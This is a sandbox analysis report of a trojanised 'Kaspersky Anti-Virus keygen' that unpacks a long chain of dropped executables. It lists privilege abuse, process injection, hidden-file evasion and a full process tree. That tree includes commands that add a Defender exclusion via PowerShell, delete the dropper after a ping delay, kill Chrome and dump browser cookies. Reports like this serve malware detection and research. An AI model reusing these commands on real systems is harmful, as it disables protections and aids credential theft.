4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeDebugPrivilege	1576	Setup.exe
Token: SeCreateTokenPrivilege	184	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	184	askinstall20.exe
Token: SeLockMemoryPrivilege	184	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	184	askinstall20.exe
Token: SeMachineAccountPrivilege	184	askinstall20.exe
Token: SeTcbPrivilege	184	askinstall20.exe
Token: SeSecurityPrivilege	184	askinstall20.exe
Token: SeTakeOwnershipPrivilege	184	askinstall20.exe
Token: SeLoadDriverPrivilege	184	askinstall20.exe
Token: SeSystemProfilePrivilege	184	askinstall20.exe
Token: SeSystemtimePrivilege	184	askinstall20.exe
Token: SeProfSingleProcessPrivilege	184	askinstall20.exe
Token: SeIncBasePriorityPrivilege	184	askinstall20.exe
Token: SeCreatePagefilePrivilege	184	askinstall20.exe
Token: SeCreatePermanentPrivilege	184	askinstall20.exe
Token: SeBackupPrivilege	184	askinstall20.exe
Token: SeRestorePrivilege	184	askinstall20.exe
Token: SeShutdownPrivilege	184	askinstall20.exe
Token: SeDebugPrivilege	184	askinstall20.exe
Token: SeAuditPrivilege	184	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	184	askinstall20.exe
Token: SeChangeNotifyPrivilege	184	askinstall20.exe
Token: SeRemoteShutdownPrivilege	184	askinstall20.exe
Token: SeUndockPrivilege	184	askinstall20.exe
Token: SeSyncAgentPrivilege	184	askinstall20.exe
Token: SeEnableDelegationPrivilege	184	askinstall20.exe
Token: SeManageVolumePrivilege	184	askinstall20.exe
Token: SeImpersonatePrivilege	184	askinstall20.exe
Token: SeCreateGlobalPrivilege	184	askinstall20.exe
Token: 31	184	askinstall20.exe
Token: 32	184	askinstall20.exe
Token: 33	184	askinstall20.exe
Token: 34	184	askinstall20.exe
Token: 35	184	askinstall20.exe
Token: SeDebugPrivilege	4652	multitimer.exe
Token: SeDebugPrivilege	3524	taskkill.exe
Token: SeDebugPrivilege	3592	svchost.exe
Token: SeDebugPrivilege	3592	svchost.exe
Token: SeDebugPrivilege	3592	svchost.exe
Token: SeDebugPrivilege	3592	svchost.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2960	setups.exe
220	setups.tmp
3592	svchost.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 4688 wrote to memory of 3300	4688	Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe	78
PID 4688 wrote to memory of 3300	4688	Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe	78
PID 4688 wrote to memory of 3300	4688	Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe	78
PID 3300 wrote to memory of 2924	3300	cmd.exe	81
PID 3300 wrote to memory of 2924	3300	cmd.exe	81
PID 3300 wrote to memory of 2924	3300	cmd.exe	81
PID 3300 wrote to memory of 4304	3300	cmd.exe	82
PID 3300 wrote to memory of 4304	3300	cmd.exe	82
PID 3300 wrote to memory of 4304	3300	cmd.exe	82
PID 3300 wrote to memory of 4052	3300	cmd.exe	83
PID 3300 wrote to memory of 4052	3300	cmd.exe	83
PID 3300 wrote to memory of 4052	3300	cmd.exe	83
PID 3300 wrote to memory of 4292	3300	cmd.exe	84
PID 3300 wrote to memory of 4292	3300	cmd.exe	84
PID 3300 wrote to memory of 4292	3300	cmd.exe	84
PID 2924 wrote to memory of 1220	2924	keygen-pr.exe	85
PID 2924 wrote to memory of 1220	2924	keygen-pr.exe	85
PID 2924 wrote to memory of 1220	2924	keygen-pr.exe	85
PID 4292 wrote to memory of 1576	4292	keygen-step-4.exe	86
PID 4292 wrote to memory of 1576	4292	keygen-step-4.exe	86
PID 4052 wrote to memory of 1900	4052	keygen-step-3.exe	87
PID 4052 wrote to memory of 1900	4052	keygen-step-3.exe	87
PID 4052 wrote to memory of 1900	4052	keygen-step-3.exe	87
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1900 wrote to memory of 2256	1900	cmd.exe	90
PID 1900 wrote to memory of 2256	1900	cmd.exe	90
PID 1900 wrote to memory of 2256	1900	cmd.exe	90
PID 1220 wrote to memory of 2208	1220	key.exe	89
PID 1576 wrote to memory of 4652	1576	Setup.exe	92
PID 1576 wrote to memory of 4652	1576	Setup.exe	92
PID 1576 wrote to memory of 2960	1576	Setup.exe	93
PID 1576 wrote to memory of 2960	1576	Setup.exe	93
PID 1576 wrote to memory of 2960	1576	Setup.exe	93
PID 4292 wrote to memory of 184	4292	keygen-step-4.exe	94
PID 4292 wrote to memory of 184	4292	keygen-step-4.exe	94
PID 4292 wrote to memory of 184	4292	keygen-step-4.exe	94
PID 2960 wrote to memory of 220	2960	setups.exe	95
PID 2960 wrote to memory of 220	2960	setups.exe	95
PID 2960 wrote to memory of 220	2960	setups.exe	95
PID 184 wrote to memory of 4188	184	askinstall20.exe	98
PID 184 wrote to memory of 4188	184	askinstall20.exe	98
PID 184 wrote to memory of 4188	184	askinstall20.exe	98
PID 4188 wrote to memory of 3524	4188	cmd.exe	101
PID 4188 wrote to memory of 3524	4188	cmd.exe	101
PID 4188 wrote to memory of 3524	4188	cmd.exe	101
PID 4652 wrote to memory of 4812	4652	multitimer.exe	106
PID 4652 wrote to memory of 4812	4652	multitimer.exe	106
PID 4292 wrote to memory of 2092	4292	keygen-step-4.exe	107
PID 4292 wrote to memory of 2092	4292	keygen-step-4.exe	107
PID 4292 wrote to memory of 2092	4292	keygen-step-4.exe	107

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3764	attrib.exe
7596	attrib.exe
7780	attrib.exe
7400	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe
"C:\Users\Admin\AppData\Local\Temp\Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2924
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1220
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:2208
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:4304
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4052
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1900
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2256
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4292
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1576
    - - C:\Users\Admin\AppData\Local\Temp\A8V0Y2SX2U\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\A8V0Y2SX2U\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Maps connected drives based on registry
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4652
      - C:\Users\Admin\AppData\Local\Temp\A8V0Y2SX2U\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\A8V0Y2SX2U\multitimer.exe" 1 3.1617432411.60680f5b14397 101
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\A8V0Y2SX2U\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\A8V0Y2SX2U\multitimer.exe" 2 3.1617432411.60680f5b14397
        7⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\orkkis0zoto\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\orkkis0zoto\cpyrix.exe" /VERYSILENT
        8⤵
        
        PID:5344
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\85214762-f233-4e63-9c91-82ec9ff3dfea\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\85214762-f233-4e63-9c91-82ec9ff3dfea\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\85214762-f233-4e63-9c91-82ec9ff3dfea\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        10⤵
        
        PID:5772
        
        C:\Users\Admin\AppData\Local\Temp\85214762-f233-4e63-9c91-82ec9ff3dfea\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\85214762-f233-4e63-9c91-82ec9ff3dfea\AdvancedRun.exe" /SpecialRun 4101d8 5772
        11⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        10⤵
        
        PID:3480
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        10⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        11⤵
        Delays execution with timeout.exe
        
        PID:5800
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        10⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        10⤵
        
        PID:2580
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 1840
        10⤵
        Program crash
        
        PID:6112
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:5420
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:5364
        
        C:\Users\Admin\AppData\Local\Temp\2s31mlrkdrj\KiffApp1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2s31mlrkdrj\KiffApp1.exe"
        8⤵
        
        PID:5332
        
        C:\Users\Admin\AppData\Local\Temp\ne2uwbe0ywm\jl2ft5tmhsr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ne2uwbe0ywm\jl2ft5tmhsr.exe" /VERYSILENT
        8⤵
        
        PID:5416
        
        C:\Users\Admin\AppData\Local\Temp\is-2KNV5.tmp\jl2ft5tmhsr.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2KNV5.tmp\jl2ft5tmhsr.tmp" /SL5="$202DA,2592217,780800,C:\Users\Admin\AppData\Local\Temp\ne2uwbe0ywm\jl2ft5tmhsr.exe" /VERYSILENT
        9⤵
        
        PID:5480
        
        C:\Users\Admin\AppData\Local\Temp\is-6R6V6.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-6R6V6.tmp\winlthsth.exe"
        10⤵
        
        PID:5892
        
        C:\Users\Admin\AppData\Local\Temp\uyaTAMch0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uyaTAMch0.exe"
        11⤵
        
        PID:768
        
        C:\Users\Admin\AppData\Local\Temp\uyaTAMch0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uyaTAMch0.exe"
        12⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\h2llnxhhip4\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\h2llnxhhip4\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:5524
        
        C:\Users\Admin\AppData\Local\Temp\is-RDCVB.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RDCVB.tmp\Setup3310.tmp" /SL5="$1035C,138429,56832,C:\Users\Admin\AppData\Local\Temp\h2llnxhhip4\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\is-107H0.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-107H0.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:2744
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
        11⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:208
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
        11⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 928
        12⤵
        Program crash
        
        PID:6528
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1004
        12⤵
        Program crash
        
        PID:1636
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1016
        12⤵
        Program crash
        
        PID:4532
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1112
        12⤵
        Program crash
        
        PID:7148
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1188
        12⤵
        Program crash
        
        PID:6612
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1204
        12⤵
        Program crash
        
        PID:7460
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1520
        12⤵
        Program crash
        
        PID:6564
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1560
        12⤵
        Program crash
        
        PID:8184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1616
        12⤵
        Program crash
        
        PID:1736
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1752
        12⤵
        Program crash
        
        PID:7844
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1592
        12⤵
        Program crash
        
        PID:6176
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1784
        12⤵
        Program crash
        
        PID:6876
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1776
        12⤵
        Program crash
        
        PID:7692
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\is-C1E3N.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-C1E3N.tmp\LabPicV3.tmp" /SL5="$304D8,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        12⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\is-HUA5J.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-HUA5J.tmp\ppppppfy.exe" /S /UID=lab214
        13⤵
        
        PID:5580
        
        C:\Program Files\Reference Assemblies\CFAMKFWVDT\prolab.exe
        
        "C:\Program Files\Reference Assemblies\CFAMKFWVDT\prolab.exe" /VERYSILENT
        14⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\is-BK35V.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BK35V.tmp\prolab.tmp" /SL5="$30368,575243,216576,C:\Program Files\Reference Assemblies\CFAMKFWVDT\prolab.exe" /VERYSILENT
        15⤵
        
        PID:5244
        
        C:\Users\Admin\AppData\Local\Temp\c8-8ecdb-b63-ae3ae-e6d625b6a0fcb\Hacilaereke.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c8-8ecdb-b63-ae3ae-e6d625b6a0fcb\Hacilaereke.exe"
        14⤵
        
        PID:6640
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ont5gz3w.yfd\md6_6ydj.exe & exit
        15⤵
        
        PID:7240
        
        C:\Users\Admin\AppData\Local\Temp\ont5gz3w.yfd\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\ont5gz3w.yfd\md6_6ydj.exe
        16⤵
        
        PID:7736
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 1276
        17⤵
        Program crash
        
        PID:1772
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hq2epidy.onm\askinstall31.exe & exit
        15⤵
        
        PID:7708
        
        C:\Users\Admin\AppData\Local\Temp\hq2epidy.onm\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\hq2epidy.onm\askinstall31.exe
        16⤵
        
        PID:5452
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\25icbljg.zlj\toolspab1.exe & exit
        15⤵
        
        PID:7880
        
        C:\Users\Admin\AppData\Local\Temp\25icbljg.zlj\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\25icbljg.zlj\toolspab1.exe
        16⤵
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\25icbljg.zlj\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\25icbljg.zlj\toolspab1.exe
        17⤵
        
        PID:6740
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ympte5pq.m0c\setup_10.2_mix.exe & exit
        15⤵
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\ympte5pq.m0c\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\ympte5pq.m0c\setup_10.2_mix.exe
        16⤵
        
        PID:7968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ikizd1l3.10i\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:6088
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nzlx2ijx.okt\app.exe /8-2222 & exit
        15⤵
        
        PID:5488
        
        C:\Users\Admin\AppData\Local\Temp\nzlx2ijx.okt\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\nzlx2ijx.okt\app.exe /8-2222
        16⤵
        
        PID:7724
        
        C:\Users\Admin\AppData\Local\Temp\nzlx2ijx.okt\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nzlx2ijx.okt\app.exe" /8-2222
        17⤵
        
        PID:8884
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sf4db3ki.m2h\file.exe & exit
        15⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\sf4db3ki.m2h\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\sf4db3ki.m2h\file.exe
        16⤵
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
        17⤵
        
        PID:6908
        
        C:\Users\Admin\AppData\Local\Temp\VB8TLIGP3Z\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VB8TLIGP3Z\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:6944
        
        C:\Users\Admin\AppData\Local\Temp\VB8TLIGP3Z\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VB8TLIGP3Z\multitimer.exe" 1 3.1617432672.6068106100437 101
        19⤵
        
        PID:8180
        
        C:\Users\Admin\AppData\Local\Temp\VB8TLIGP3Z\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VB8TLIGP3Z\multitimer.exe" 2 3.1617432672.6068106100437
        20⤵
        
        PID:6792
        
        C:\Users\Admin\AppData\Local\Temp\sum3sjqgfs3\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sum3sjqgfs3\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:6164
        
        C:\Users\Admin\AppData\Local\Temp\is-VFBEU.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-VFBEU.tmp\vict.tmp" /SL5="$305F8,870426,780800,C:\Users\Admin\AppData\Local\Temp\sum3sjqgfs3\vict.exe" /VERYSILENT /id=535
        22⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\is-OE1FU.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OE1FU.tmp\win1host.exe" 535
        23⤵
        
        PID:8724
        
        C:\Users\Admin\AppData\Local\Temp\cw0ddhvuozj\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cw0ddhvuozj\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:6320
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        22⤵
        
        PID:2340
        
        C:\Users\Admin\AppData\Local\Temp\5761cd1d-0f3a-449d-bfd9-dcb719aa7aa6\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5761cd1d-0f3a-449d-bfd9-dcb719aa7aa6\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5761cd1d-0f3a-449d-bfd9-dcb719aa7aa6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        23⤵
        
        PID:720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5761cd1d-0f3a-449d-bfd9-dcb719aa7aa6\test.bat"
        24⤵
        
        PID:9188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        23⤵
        
        PID:9144
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        23⤵
        
        PID:7308
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        24⤵
        Delays execution with timeout.exe
        
        PID:9016
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        23⤵
        
        PID:1096
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        22⤵
        
        PID:8824
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:8792
        
        C:\Users\Admin\AppData\Local\Temp\an1g5j0egou\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\an1g5j0egou\app.exe" /8-23
        21⤵
        
        PID:8116
        
        C:\Users\Admin\AppData\Local\Temp\htenyjbd21j\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\htenyjbd21j\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:6732
        
        C:\Users\Admin\AppData\Local\Temp\is-QHGF4.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QHGF4.tmp\Setup3310.tmp" /SL5="$30640,138429,56832,C:\Users\Admin\AppData\Local\Temp\htenyjbd21j\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\is-JJ7TO.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-JJ7TO.tmp\Setup.exe" /Verysilent
        23⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\kvvwlp3ykat\tgkzsvbev2w.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kvvwlp3ykat\tgkzsvbev2w.exe" /ustwo INSTALL
        21⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "tgkzsvbev2w.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\kvvwlp3ykat\tgkzsvbev2w.exe" & exit
        22⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "tgkzsvbev2w.exe" /f
        23⤵
        Kills process with taskkill
        
        PID:7316
        
        C:\Users\Admin\AppData\Local\Temp\K0MBHRH2SZ\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\K0MBHRH2SZ\setups.exe" ll
        18⤵
        
        PID:7956
        
        C:\Users\Admin\AppData\Local\Temp\is-TCNQT.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TCNQT.tmp\setups.tmp" /SL5="$20620,635399,250368,C:\Users\Admin\AppData\Local\Temp\K0MBHRH2SZ\setups.exe" ll
        19⤵
        
        PID:5708
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
        17⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        18⤵
        
        PID:6244
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        19⤵
        Kills process with taskkill
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"
        17⤵
        
        PID:5832
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        18⤵
        
        PID:7076
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        19⤵
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        17⤵
        
        PID:3212
        
        C:\Users\Admin\AppData\Roaming\A48F.tmp.exe
        
